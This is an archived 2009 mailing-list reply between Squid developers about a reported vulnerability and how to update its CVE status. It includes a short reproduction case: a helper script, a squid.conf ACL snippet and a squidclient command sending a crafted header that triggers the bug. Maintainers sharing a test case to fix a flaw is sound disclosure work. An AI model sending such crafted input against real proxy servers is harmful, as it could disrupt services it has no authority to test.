tis 2009-10-13 klockan 12:12 +1300 skrev Amos Jeffries:
> Okay, I've asked the Debian reporter for access to details.
> Lacking clear evidence of remote exploit I'll follow along with the quiet
> approach.
Right.. meant to provide the details as well but forgot... It can be
found in the RedHat bug report.
https://bugzilla.redhat.com/show_bug.cgi?id=518182
A sample test case is as follows:
-- test-helper.sh (executable) ---
#!/bin/sh
while read line; do
echo OK
done
-- end test-helper.sh
-- squid.conf (before where access is normally allowed) --
external_acl_type test %{Test:;test} /path/to/test-helper.sh
acl test external test
http_access deny !test
-- end squid.conf --
-- test command --
/usr/bin/squidclient -H "Test: a, b, test=test\n" http://www.squid-cache.org/
-- end test command --
> The CVE has reference to our bugs which are clearly closed. If there is
> more to be done to notify anyone can you let me know what that is please?
> the other CVE from this year are in similar states of questionable
> open/closed-ness.
Ah, now I get what you mean.
yes we should be more active in giving vendor feedback to CVE in
general.. Contacting
cve_at_mitre.org
is a good start I guess.
Regards
Henrik
Received on Mon Oct 12 2009 - 23:51:22 MDT
This archive was generated by hypermail 2.2.0 : Tue Oct 13 2009 - 12:00:06 MDT